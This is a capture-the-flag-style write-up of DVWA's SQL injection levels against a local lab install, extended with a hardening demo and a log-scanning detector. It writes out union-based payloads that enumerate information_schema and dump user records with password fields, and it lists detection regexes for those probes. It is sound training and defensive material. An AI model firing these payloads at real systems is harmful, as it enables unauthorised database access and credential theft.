DVWA-SQLi clearance
Primary: Obtaining the database version number
Determine the type of injection
Try a single quote and then a double quote: the single quote causes an error while the double quote does not, so the injection is string type, enclosed in single quotes.
Conclusion:
In string injection, whichever quote character triggers an error is the one the query uses to enclose the value.
Infer the number of columns with order by
http://localhost/dv/vulnerabilities/sqli/?id=2' order by 2--+ &Submit=Submit#
Union injection: query the database version number
http://localhost/dv/vulnerabilities/sqli/?id=2' and 1=2 union select version(),2--+ &Submit=Submit#
Intermediate: Get the database name
Check for echo:
The page echoes query results.
Determine the type of injection: try quotes
Our quotes turn out to be escaped.
Count the columns with order by
Assuming the parameter is numeric, and since the page echoes results, use order by to count the columns.
order by 3 reports an error, so the number of columns is 2.
Find the echo positions
POST request (as shown in the figure):
Submit=Submit&id=2 and 1=2 union select 1,2
Union query
The database name can be obtained with a union query.
POST request (as shown in the figure):
Submit=Submit&id=2 and 1=2 union select 1,database()
Source code audit
The source code passes our input through mysqli_real_escape_string(), so string (quote-based) injection is not possible. However, the query embeds the id as a number rather than inside quotes, so the escaping has nothing to act on: this is numeric injection. Because the page echoes results, a union query can retrieve the database name.
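The audit point above, that quote escaping is only meaningful when the value sits inside quotes, is easy to see in a small runnable model. The following Python is an added example written for this page, not DVWA's own code: it uses an in-memory SQLite table (constructed, two sample rows) as a stand-in for MySQL, a quote-doubling escape_quotes() as a stand-in for mysqli_real_escape_string(), and shows the escaped-but-unquoted numeric lookup beside the same escaping in a quoted context and beside a validated, parameterized version.

```python
import re
import sqlite3


def make_demo_db():
    """Constructed in-memory stand-in for DVWA's users table (two sample rows).
    SQLite is used so the example runs without a MySQL server."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "admin"), (2, "Gordon", "Brown")],
    )
    return conn


def escape_quotes(value):
    """Stand-in for mysqli_real_escape_string(). SQLite doubles a quote where
    MySQL backslash-escapes it; in both dialects the function only touches
    quote characters, which a numeric-context payload never contains."""
    return value.replace("'", "''")


def lookup_numeric_escaped(conn, user_input):
    """Intermediate-level pattern: the id is escaped and then spliced, unquoted,
    into a numeric comparison. The escaping is correct but irrelevant here."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = {escape_quotes(user_input)}"
    return conn.execute(query).fetchall()


def lookup_quoted_escaped(conn, user_input):
    """Same escaping, but the value sits inside single quotes. Here the escape
    does its job: a quote in the input stays part of the string literal."""
    query = f"SELECT first_name, last_name FROM users WHERE first_name = '{escape_quotes(user_input)}'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, user_input):
    """Hardened form: reject anything that is not a decimal integer, then bind
    the value as a parameter so the driver never treats it as SQL text."""
    if not re.fullmatch(r"[0-9]+", user_input):
        raise ValueError("id must be a non-negative integer")
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (int(user_input),)
    ).fetchall()


def rejects(conn, user_input):
    """True if the hardened lookup refuses the input (convenience for checks)."""
    try:
        lookup_parameterized(conn, user_input)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_demo_db()
    probe = "2 and 1=2 union select 1,2"  # the intermediate-level payload from this page
    print("escaped, numeric context:", lookup_numeric_escaped(db, probe))      # [(1, 2)]
    print("escaped, quoted context :", lookup_quoted_escaped(db, "' or 1=1--"))  # []
    print("parameterized rejects   :", rejects(db, probe))                      # True
```

The numeric lookup returns the injected row even though every quote in the input was escaped, because there were none; the quoted lookup with the same escaping returns nothing for a quote-based probe; the parameterized lookup refuses the probe before it reaches the database. The fix is therefore not "escape harder" but "validate the type and bind the value", which works the same whether the column is numeric or text.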
Advanced: Get any content
The advanced level is essentially the same as the intermediate level: both use union injection. The differences are that the advanced level must close a single quote, and it does not pass our input through mysqli_real_escape_string().
Check for echo
Entering different ids shows different results on the page, which confirms there is echo.
Determine the type of injection
Trying single and double quotes, the single quote causes an error, so it is string type injection enclosed in single quotes.
order by gives 2 columns (order by 3 reports an error):
http://localhost/dv/vulnerabilities/sqli/?id=1' order by 3--+&Submit=Submit#
Determine the echo positions
http://localhost/dv/vulnerabilities/sqli/?id=1' and 1=2 union select 1,2--+&Submit=Submit#
So arbitrary content can be retrieved with union injection.
Get the database name and version
http://localhost/dv/vulnerabilities/sqli/?id=1' and 1=2 union select database(),version()--+&Submit=Submit#
Database: dvwa
Version: 5.5.53
Get the tables in the database
http://localhost/dv/vulnerabilities/sqli/?id=1' and 1=2 union select group_concat(table_name),2 from information_schema.tables where table_schema=database()--+&Submit=Submit#
Tables: guestbook, users
Get the fields of the guestbook table
http://localhost/dv/vulnerabilities/sqli/?id=1' and 1=2 union select group_concat(column_name),2 from information_schema.columns where table_schema=database() and table_name="guestbook"--+&Submit=Submit#
Fields of the guestbook table: comment_id, comment, name
Get all the data of the guestbook table
http://localhost/dv/vulnerabilities/sqli/?id=1' and 1=2 union select CONCAT(comment_id,'--',comment,'--',name),2 from dvwa.guestbook --+&Submit=Submit#
Data:
1--This is a test comment.--test
Get the fields of the users table
http://localhost/dv/vulnerabilities/sqli/?id=1' and 1=2 union select group_concat(column_name),2 from information_schema.columns where table_schema=database() and table_name="users"--+&Submit=Submit#
Fields of the users table: user_id, first_name, last_name, user, password, avatar, last_login, failed_login
Get all the data in the users table
http://localhost/dv/vulnerabilities/sqli/?id=1' and 1=2 union select CONCAT(user_id,'--',first_name,'--',last_name,'--',user,'--',password,'--',avatar,'--',last_login,'--',failed_login),2 from dvwa.users --+&Submit=Submit#
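From the defending side, the sequence walked through above (order by probes, a union select, then information_schema.tables and information_schema.columns lookups, all terminated with --+) leaves a recognisable trail in web server logs. The Python below is an added example, not part of the original write-up: it decodes the query string of each request path and flags the parameters that match those indicators. The request paths in SAMPLE_REQUESTS are constructed for the example, URL-encoded the way a server would log the page's payloads.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Indicators of the enumeration steps shown on this page, checked against each
# decoded query-string value. The list order determines the order of reported hits.
SIGNATURES = [
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I)),
    ("comment_terminator", re.compile(r"--\s|#|/\*")),
]

# Constructed request paths as a web server would log them (no fragment: the
# trailing '#' in the page's URLs never leaves the browser). '+' decodes to a
# space, which is why '--+' works as a comment terminator.
SAMPLE_REQUESTS = [
    "/dv/vulnerabilities/sqli/?id=1&Submit=Submit",
    "/dv/vulnerabilities/sqli/?id=2%27%20order%20by%202--+%20&Submit=Submit",
    "/dv/vulnerabilities/sqli/?id=1%27%20and%201=2%20union%20select%20"
    "group_concat(table_name),2%20from%20information_schema.tables%20"
    "where%20table_schema=database()--+&Submit=Submit",
]


def scan_request(path):
    """Decode every query parameter of one request path and return
    {param: [matched signature names]} for parameters with at least one hit."""
    params = parse_qs(urlsplit(path).query)
    hits = {}
    for name, values in params.items():
        matched = []
        for value in values:
            for sig, pattern in SIGNATURES:
                if sig not in matched and pattern.search(value):
                    matched.append(sig)
        if matched:
            hits[name] = matched
    return hits


def scan_log(paths):
    """Run scan_request over many request paths and return (index, path, hits)
    for the flagged ones, ready to be raised as alerts."""
    flagged = []
    for index, path in enumerate(paths):
        hits = scan_request(path)
        if hits:
            flagged.append((index, path, hits))
    return flagged


if __name__ == "__main__":
    for index, path, hits in scan_log(SAMPLE_REQUESTS):
        print(f"request {index}: {hits}")
```

Matching on decoded values rather than the raw log line matters: the probe payloads arrive percent-encoded, and the `+` that terminates the comment only becomes a space after decoding. A second, cheaper control that the source-code audit above already suggests is to alert whenever a parameter the application treats as numeric (here `id`) contains anything other than digits; that catches the whole sequence without any SQL keyword matching.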